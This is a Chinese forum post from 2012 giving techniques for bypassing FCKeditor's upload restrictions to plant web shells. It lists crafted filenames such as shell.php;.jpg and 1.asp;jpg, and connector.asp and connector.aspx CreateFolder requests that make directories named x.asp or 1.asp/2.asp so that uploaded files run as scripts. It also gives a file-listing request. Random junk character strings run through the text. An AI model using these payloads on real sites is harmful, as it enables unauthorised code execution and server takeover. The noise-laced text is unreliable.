很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg% W8 s: ]2 S" N* {; i
; N% m, S; U( I% ?6 @' i' j
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。1 S# J7 K$ q7 Q
7 I! j$ Y t. e) q/ t
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
+ V$ @4 W! o, }3 E3 U L$ C
! N+ c6 }8 w" M( a% J! v突破建立文件夹:1 @7 e9 r3 F6 L
& i; y* K, b, `! i9 [( g
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp6 j- B M- ^( J4 E2 q7 b1 G
0 s, f7 `4 p2 K: b8 z9 X/ u参数:
, f; `( x" }; ^/ u) X2 _1 z6 a; Y; j h
当前目录名:CurrentFolder=/qing.asp; m% [4 ~- [5 q9 S7 U
9 A) h: H2 |& y% v8 m
新的目录名:NewFolderName=x.asp' r" i" b1 D) _/ a1 p |
8 T: S' P0 {) _3 K2 k# w ^
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……, I' M }8 R1 A% T( Q
" F% | Y" b5 n那么 x.asp 就已经建立生成了,此方法百试百灵!) T( ]% f9 J4 Z$ b
* x! G! t$ `1 W新建文件夹参数 x.asp,基本都能搞定。) _) m3 S7 f# S4 f! C
; R- {' [, u* c/ [. {9 K
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
$ P( g" x5 @9 \+ @( H
! @; c; U* B8 Q+ B7 a# {aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
( o- O- R& z* P' C9 a; R$ U; M3 a( `1 G# |" A
获取文件列表/ K o" d7 E5 h4 O
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F. f# _" p2 R' J# z, ?, s" |# R
) z) n" I7 @7 Q+ g8 U9 Y$ U |
发表于 2012-12-31 09:27:09
收藏
支持
反对